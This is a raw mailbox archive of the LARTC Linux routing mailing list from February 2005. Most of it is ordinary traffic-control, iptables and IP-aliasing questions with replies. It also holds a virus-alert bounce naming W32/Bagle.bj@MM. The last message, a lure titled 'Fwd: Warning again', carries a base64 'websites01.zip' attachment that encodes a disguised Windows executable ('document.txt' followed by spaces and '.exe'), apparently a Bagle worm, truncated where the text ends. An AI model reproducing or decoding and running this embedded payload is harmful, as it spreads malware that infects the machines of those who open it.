p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6en//////////////// //////////////////////////+np6enCgoKCgoKCgqnp6en//////////////////////// //////////////////+np6enCgoKCgoKCgqnp6en//////////////////////////8Hp6en p/////////+np6enCgoKCgoKCgqnp6en/////////////////////////6enp6enp6f///// //+np6enCgoKCgoKCgqnp6en////////////////////////p6enp///p6f///////+np6en CgoKCgoKCgqnp6en//////////////////////+np6enp///p6f///////+np6enCgoKCgoK Cgqnp6en///////x7+ynp6en7O///6enp/+np///p6f///////+np6enCgoKCgoKCgqnp6en /////++np6enp6enp6enp6en//+np6enp/////////+np6enCgoKCgoKCgqnp6en////76en p6enp6enp6enp6f///8Hp6en//////////+np6enCgoKCgoKCgqnp6en///vp6enp6enp6en p6enp6fv////p6en//////////+np6enCgoKCgoKCgqnp6en//Gnp6enp6enp6enp6enp6en /////6enp/////////+np6enCgoKCgoKCgqnp6en/++np6enp6enp6en//+np6en7/////+n p6f///////+np6enCgoKCgoKCgqnp6en/+ynp6enp6enp6f///+np6en7P//////p6en//// //+np6enCgoKCgoKCgqnp6en/6enp6enp6en/////6enp6enp////////6enp/////+np6en CgoKCgoKCgqnp6en/6enp6f/p6en/6f/p6enp6enp/////////+np6f///+np6enCgoKCgoK Cgqnp6en/6enp6f/p6f/////p6enp6enp///////////p6cH//+np6enCgoKCgoKCgqnp6en /6enp6f//////6enp6enp6enp///////p6enp6en//+np6enCgoKCgoKCgqnp6en/+ynp6f/ ////p6enp6enp6en7P////+np6enp6en//+np6enCgoKCgoKCgqnp6en/++np6f/////p6en p6enp6en7////6enp////6en//+np6enCgoKCgoKCgqnp6en//+np6f///////+np6enp6en ////p6en/////6en//+np6enCgoKCgoKCgqnp6en///vp6enp6enp6enp6enp6fv//+np6f/ /////6en//+np6enCgoKCgoKCgqnp6en////76enp6enp6enp6enp6f//6enp///////p6cH //+np6enCgoKCgoKCgqnp6en/////++np6enp6enp6enp6enp6en//////+np6f///+np6en CgoKCgoKCgqnp6en////////7+ynp6en7O///6enp6f//////6enp/////+np6enCgoKCgoK Cgqnp6en/////////////////////6enp///////p6en//////+np6enCgoKCgoKCgqnp6en ////////////////////p6en//////+np6f///////+np6enCgoKCgoKCgqnp6en//////// //////////+np6f//////6enp/////////+np6enCgoKCgoKCgqnp6en//////////////// /6enp///////p6en//////////+np6enCgoKCgoKCgqnp6en/////////////////wenp6en p6enp6f///////////+np6enCgoKCgoKCgqnp6en////////////////////B6enp6enB/// //////////+np6enCgoKCgoKCgqnp6en//////////////////////////////////////// //+np6enCgoKCgoKCgqnp6en//////////////////////////////////////////+np6en CgoKCgoKCgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoK Cgqnp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgqnp6enp6enp6en p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCv///////wAA////////AAD///////8AAP///////wAA8AAAAAAPAADwAAAA AA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAA AAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA 8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAP AADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAA AA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAADwAAAAAA8AAPAA AAAADwAA8AAAAAAPAADwAAAAAA8AAPAAAAAADwAA8AAAAAAPAAD///////8AAP///////wAA ////////AAD///////8AAAAAAQAFACAgEAABAAQA6AIAAAEAEBAQAAEABAAoAQAAAgAgIAAA AQAIAKgIAAADABAQAAABAAgAaAUAAAQAMDAAAAEACACoDgAABQBlsXWqH6FOM7KPAJ92Dnt2 SJSyfC4WILgESgWYKBwcmVgsMDUuJo43qw0yv2BAR1Mlr6QiLsFOk6q3KwlFOK2PTK/ATHB3 kHqxGL0Mc7M6vzy9oAbCUhNpW7l9qL4nwMC8QMaaqapbrKdsOl1iNXpqI4dJKkpSxSk7EGSL eS4Isr4KgkuScZ6ZNWYKUTsfphVhohgWO454pmxxgQdHAQRsV3BAbaEUVidZj3QCaHCgOBUW lGhynjx4ChBaJoxNI3R8TGEEfnS0IkNLoz0clIk7GEfGfMO6OKtPqrJMeGkQQLwHiriOtm+r eisyJnQsxwaiRI/EMR5xDql4ZIxcpYOOBhBxmGOWdG2AX8NgkZ5vAYWupXELMcevTHVTIBvA HUWSEKNbUGnHiGW2hKy3ZWlOSpo/kAqbMwSHc0N/vK4YXA98LTudVX+oxKBstruLTcSlsDUo ow+qUhapa7eBmGC5PjuDw8JUIpZvulcXBrvALhgLpBmzLRURmiawhFwUWzOykApxLS0TN1F5 lKWzEkwrbiErBp4RJi9ZuqFXDn53el1oVm2bQpVSVoFYPYg2GIZ+FJemvDkTI32xQIl1RZ6c sEWxmZ4ANTwrTRGLxa7EvguYpqSYKX5KZFEFl3hnMikoqndhUTF/LwyIoAetahAOlAyzjXgB WlbCRRKvG4dowImPo0SMrId+wLM9MaYisYafvGVymXgEEn8RNSGHfVyZnn2vSY5OAgx8trEe qcMiCWpFNg== ----------iqmoxupifwqudqqiywkx-- From techsupport@sqliaison.com Thu Feb 3 11:15:51 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Thu, 3 Feb 2005 06:15:51 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c509e1$b84f3f20$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C509B7.CF7BA820 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield=C2=99 Alert=20 The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 03 Feb 2005 06:15:50 Subject line: [LARTC] Delivery by mail From: lartc-admin@mailman.ds9a.nl To: LARTC Action taken: Deleted Virus Found: W32/Bagle.bj@MM Reason: Anti-Virus Rule Group:=20 For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com =20 =20 ------=_NextPart_000_0001_01C509B7.CF7BA820 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: 7bit SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 03 Feb 2005 06:15:50
Subject line: [LARTC] Delivery by mail
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle.bj@MM
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

 

------=_NextPart_000_0001_01C509B7.CF7BA820-- From m@tthias.net Thu Feb 3 12:02:45 2005 From: m@tthias.net (Matthias Wimmer) Date: Thu, 3 Feb 2005 13:02:45 +0100 Subject: [LARTC] TOS for IPv6 traffic in a tunnel Message-ID: <20050203120245.GA6126@false> This is a MIME-formatted message. If you see this text it means that your E-mail software does not support MIME-formatted messages. --=_hermes.muc.eniac.de-6235-1107432166-0001-2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi! I searched the internet but did not find any results yet. Maybe here is someone that might help me. Is it possible to use the traffic class of an IPv6 packet to set the TOS value of a wrapping IPv4 packet, that will transport the IPv6 packet through a tunnel? I am asking this because I want to extend the traffic classes I am using on my DSL link to also classify IPv6 packets correctly that are routed through a tunnel over this DSL link. Another question: Is it possible that ssh/scp set the traffic class of IPv6 packets? The class seems to be 0x00 for both applications while with IPv4 connections I see different ToS values for both. Thank you! Matthias --=20 Fon: +49-(0)70 0770 07770 http://web.amessage.info Fax: +49-(0)89 312 88 654 xmpp:mawis@amessage.info --=_hermes.muc.eniac.de-6235-1107432166-0001-2 Content-Type: application/pgp-signature; name="signature.asc" Content-Transfer-Encoding: 7bit Content-Description: Digital signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFCAhLlPSc92k5Zx+YRAkVzAJ0fmyiOhO1uBGBiUVxf3N9JCNZI+QCeI7lu jGRSp5BaFrEPXBnB36gbtx4= =EM6q -----END PGP SIGNATURE----- --=_hermes.muc.eniac.de-6235-1107432166-0001-2-- From igogu@umsoft.ro Thu Feb 3 13:08:56 2005 From: igogu@umsoft.ro (Ionut Gogu) Date: Thu, 3 Feb 2005 15:08:56 +0200 Subject: [LARTC] bandwidth for each individual IP Message-ID: <001d01c509f1$84797d90$340aa8c0@unix> This is a multi-part message in MIME format. ------=_NextPart_000_001A_01C50A02.47E835E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello! I'm using a Slackware Linux as a router and 50 IP addresses for my LAN = Clients. Is there any program i can install that will be able to tell me: =20 how much (ie. kbps) each individual IP is using at moment t? ------=_NextPart_000_001A_01C50A02.47E835E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello!
I'm using a Slackware Linux as a router =  and=20  50 IP addresses for my LAN Clients.
 Is there any program = i can=20 install that will be able to tell me:
 
  how much     = (ie. kbps) each=20 individual IP is using at moment t?
------=_NextPart_000_001A_01C50A02.47E835E0-- From nik@varna.net Thu Feb 3 14:01:51 2005 From: nik@varna.net (Nikolay Datchev) Date: Thu, 3 Feb 2005 16:01:51 +0200 (EET) Subject: [LARTC] bandwidth for each individual IP In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix> References: <001d01c509f1$84797d90$340aa8c0@unix> Message-ID: http://www.ex-parrot.com/~pdw/iftop/ -- Nikolay Datchev On Thu, 3 Feb 2005, Ionut Gogu wrote: > Hello! > I'm using a Slackware Linux as a router and 50 IP addresses for my LAN Clients. > Is there any program i can install that will be able to tell me: > > how much (ie. kbps) each individual IP is using at moment t? > From stef.coene@docum.org Thu Feb 3 14:48:19 2005 From: stef.coene@docum.org (Stef Coene) Date: Thu, 3 Feb 2005 15:48:19 +0100 Subject: [LARTC] What does flowid:1 mean here? In-Reply-To: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com> References: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com> Message-ID: <200502031548.19142.stef.coene@docum.org> On Thursday 03 February 2005 07:11, CcM wrote: > Hi, > I got the following lines from 'Linux Advanced Routing & Traffice > Control HOWTO' and got confused! > > iptables -A PREROUTING -i $INDEV -t mangle -p tcp --syn \ > -j MARK --set-mark 1 > tc qdisc add dev $INDEV handle ffff: ingress > tc filter add dev $INDEV parent ffff: protocol ip prio 50 handle 1 fw > \ police rate 1kbit burst 40 mtu 9k drop flowid :1 > > Does the second command mean that the filter will police the traffic > of syn to 1kbit by dropping? What does flowid:1 mean here? It means that all traffic that's under 1kbit, will be send to class :1 (or long notation: ffff:1). All traffic above 1kbit will be dropped. Stef From crashev@eweb-pro.com Thu Feb 3 15:33:06 2005 From: crashev@eweb-pro.com (=?iso-8859-2?q?Pawe=B3?=) Date: Thu, 3 Feb 2005 16:33:06 +0100 Subject: [LARTC] bandwidth for each individual IP In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix> References: <001d01c509f1$84797d90$340aa8c0@unix> Message-ID: <200502031633.07867.crashev@eweb-pro.com> Dnia czwartek 03 luty 2005 14:08, Ionut Gogu napisa=B3: > Hello! > I'm using a Slackware Linux as a router and 50 IP addresses for my LAN > Clients. Is there any program i can install that will be able to tell me: > > how much (ie. kbps) each individual IP is using at moment t? Try jnettop. From saz" This is a multi-part message in MIME format. ------=_NextPart_000_003E_01C509F1.A5034370 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi guys im trying to make a port redirecction using iproute together = with iptables mangle option .. but for some strange reason is not = working yet, I know i can do it in a diferent way, but the idea is using = packet marking and redirect the packets with a rule. I have two computers PC1 and PC2 PC1: 192.168.0.1 this is the one connected to internet, and this machine = make the redirection PC2: 192.168.0.2 this is the smtp server So this is what i do in PC1: first i mark all the packets incoming for 25 port with "1": iptables -t mangle -A PREROUTING -p tcp --dport 25 -j MARK --set-mark 1 then i create a table called smtp: echo 200 smtp >> /etc/iproute2/rt_tables after that i set PC2 as default via for my smtp table: ip route add default via 192.168.0.2 table smtp and finally i make the rule for smtp table ip rule add fwmak 1 table smtp this would have to work, but is not redirecting nothing... i can see that is making the packets with 1 using the command iptables = -t mangle -L PREROUTING -v but is not working, any one can help me? ------=_NextPart_000_003E_01C509F1.A5034370 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi guys im trying to make a port = redirecction using=20 iproute together with iptables mangle option .. but for some strange = reason is=20 not working yet, I know i can do it in a diferent way, but the idea = is=20 using packet marking and redirect the packets with a = rule.
 
I have two computers PC1 and = PC2
 
PC1: 192.168.0.1 this is the one = connected to=20 internet, and this machine make the redirection
PC2: 192.168.0.2 this is the smtp=20 server
 
So this is what i do in=20 PC1:
 
first i mark all the packets incoming = for 25=20 port with "1":
 
iptables -t mangle -A = PREROUTING -p tcp=20 --dport 25 -j MARK --set-mark 1
 
then i create a table called = smtp:
 
echo 200 smtp >>=20 /etc/iproute2/rt_tables
 
after that i set PC2 as default via for = my smtp=20 table:
 
ip route add default via = 192.168.0.2 table=20 smtp
 
and finally i make the rule for smtp=20 table
 
ip rule add fwmak 1 table=20 smtp
 
this would have to work, but is not = redirecting=20 nothing...
 
i can see that is making the packets = with 1 using=20 the command iptables -t mangle -L PREROUTING -v but is = not=20 working, any one can help me?
------=_NextPart_000_003E_01C509F1.A5034370-- From mariusrugan@gmail.com Thu Feb 3 16:00:40 2005 From: mariusrugan@gmail.com (mariusrugan@gmail.com) Date: Thu, 03 Feb 2005 18:00:40 +0200 Subject: [LARTC] bandwidth for each individual IP In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix> References: <001d01c509f1$84797d90$340aa8c0@unix> Message-ID: <42024AA8.7010203@gmail.com> Ionut Gogu wrote: > Hello! > I'm using a Slackware Linux as a router and 50 IP addresses for my > LAN Clients. > Is there any program i can install that will be able to tell me: > > how much (ie. kbps) each individual IP is using at moment t? salut, :) u can use tcptrack, supports libcap expressions , as i am sure iftop does too, as i see based on libcap, never tested it alltho' ... but preparing for ... :) tcptrack is a robust application, responds very quickly to kernel load from network traffic, myself using it for network monitoring and audit for more than 62 workstations, libcap expressions & filtering are less complicated than tcpdump based ones, other words looks good, works good. http://www.rhythm.cx/~steve/devel/tcptrack/ From raycharles_man@yahoo.com Thu Feb 3 22:08:15 2005 From: raycharles_man@yahoo.com (Ray Charles) Date: Thu, 3 Feb 2005 14:08:15 -0800 (PST) Subject: [LARTC] best patch for iptables ratelimiting Message-ID: <20050203220816.70207.qmail@web61208.mail.yahoo.com> According to the F.A.Q. there's a patch to do ratelimiting: http://etudiant.univ-mlv.fr/~jpetazzo/bytelimit.tgz Going with the thought that this is current..I tried it. I wasn't able to get it to compile, as support for invert was causing a failure(i think). But i was able to get it to compile when I changed line 73 and my box loaded the module. Anyone know if this will do ratelimit based on sessions? or based on bandwidth? I am partial to doing ratelimit based on sessions. Thanks- Ray __________________________________ Do you Yahoo!? Take Yahoo! Mail with you! Get it on your mobile phone. http://mobile.yahoo.com/maildemo From shemminger@osdl.org Fri Feb 4 00:22:40 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Thu, 3 Feb 2005 16:22:40 -0800 Subject: [LARTC] Issue with using using tc api In-Reply-To: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com> References: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com> Message-ID: <20050203162240.45c273e4@dxpl.pdx.osdl.net> On Thu, 03 Feb 2005 11:43:40 +0800 "sanjeev ravindran" wrote: > Thank you so much for ur response Stephen, > > Ya, I found that dlopen tries to load q_htb.so.. and it fails.. > I tried to locate q_htb.so in my rh9 machiene.. but i couldnt locate it.. > Could you let me know how build q_htb.so standalone ?? > Thanks in advance, > With best regards, > Sanjeev Ravindran Something like: gcc -D_GNU_SOURCE -O2 -Wstrict-prototypes -Wall -g -I../include \ -DRESOLVE_HOSTNAMES -DCONFIG_GACT -DCONFIG_GACT_PROB -shared -fpic q_htb.c -o q_htb.so The tc/Makefile shows how it is done for q_netem.so From 3ds@norwesters.net Fri Feb 4 09:20:03 2005 From: 3ds@norwesters.net (3ds@norwesters.net) Date: Fri, 4 Feb 2005 01:20:03 -0800 Subject: [LARTC] routable subnet as aliased IP's? Message-ID: <1107508803.42033e435a792@mail.norwesters.org> Greetings all! I just got a colocated server space and the ISP has given me an IP address and a routable /29 subnet. Here's a partial snippet of the info they gave me (with the real addressess changed for privacy) ==== WAN Address Customer IP Address : 100.0.33.14 Netmask : 255.255.255.248 Broadcast Address : 100.0.33.15 Default Gateway : 100.0.33.9 ==== Routed Network IP Address Type : 100.0.43.152/29 Class-C Subnet Number of IP Addrs : 6 Domain Name : example.net Customer IP Addresses : 100.0.43.{153 thru 158} Netmask : 255.255.255.248 Broadcast Address : 100.0.43.159 And they provided this chart: - | | +----------+ | | Customer | |------| Host #1 | | .154 | | | +----------+ - WAN - - Subnet - | +------+ Net/Mask +----------+ Net/Mask | +----------+ | ISP | 100.0.33.8 | Customer | 100.0.43.152 | | Customer | |Router|---- /29 -----|Colocation|---- /248 ----|------| Host #2 | | | .9 .14 | Router | .153 | .155 | | +------+ +----------+ | +----------+ ** REQUIRED ** | ** DEVICE ** | +----------+ | | Customer | |------| Host #n | | .156 | | | +----------+ | - I have a single server with Fedora Core3 (x86-64 2.6.10-1 kernel) installed, and my intent is to use the iproute2 tools to set up aliases for .154, .155, .156, etc. and then use IP Virtual Hosts in Apache. So, to my question. I could get a router for routing the /29 subnet as the ISP suggests, but can I use my Linux machine to do this? Can I mount eth0 as 100.0.33.14 and then setup the 100.0.43.152-158 as aliases and write the routing so that everything works? I have read chapters 3 and 4 of the LARTC, and I think it may be possible, but it's just not clicking yet as to how I might be able to do this. And to add one last twist to this... let's say that I can do the above, what if I wanted to take one of those IP's from the /29 subnet and route it on to another system plugged into my eth1 while maintaining all of the other IP's as aliases? Am I dreaming? Can you help me? Thanks! Ray From steve@4Dllc.com Fri Feb 4 09:26:28 2005 From: steve@4Dllc.com (Steve Comfort) Date: Fri, 04 Feb 2005 11:26:28 +0200 Subject: [LARTC] Patches References: Message-ID: <42033FC4.2090200@4Dllc.com> Hi All, I'm trying to cross-compile tc for an IXP ARM processor, using kernel 2.4.19. The compilation fails due to not finding struct tc_dly_qopt in include/linux/tc_sched.h Can anyone point me at a patch that will resolve this? Best regards Steve Comfort From sanjeev_ravindran@linuxmail.org Fri Feb 4 12:02:29 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Fri, 04 Feb 2005 20:02:29 +0800 Subject: [LARTC] Unable to delete htb class Message-ID: <20050204120229.02F7E21AFF9@ws5-6.us4.outblaze.com> Hi, Im trying to delete an htb class using tc... but i get the following error RTNETLINK ANSWERS: Device or resource busy What could be the proble= m? I had attached a tbf to it and removed it prior to removing the class.. i t= ried to delete the class without deleting the qdisc also.. both cases it fa= ils.. Any help regarding this will be most appreciated.. Thanks in advance, Sanjeev R --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From kleptog@cupid.suninternet.com Fri Feb 4 12:39:07 2005 From: kleptog@cupid.suninternet.com (kleptog@cupid.suninternet.com) Date: Fri, 4 Feb 2005 14:39:07 +0200 Subject: [LARTC] Fwd: Warning again Message-ID: <20050204124718.B7AA140A9@outpost.ds9a.nl> This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Do not visit this illegal websites! ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="websites01.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="websites01.zip" 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 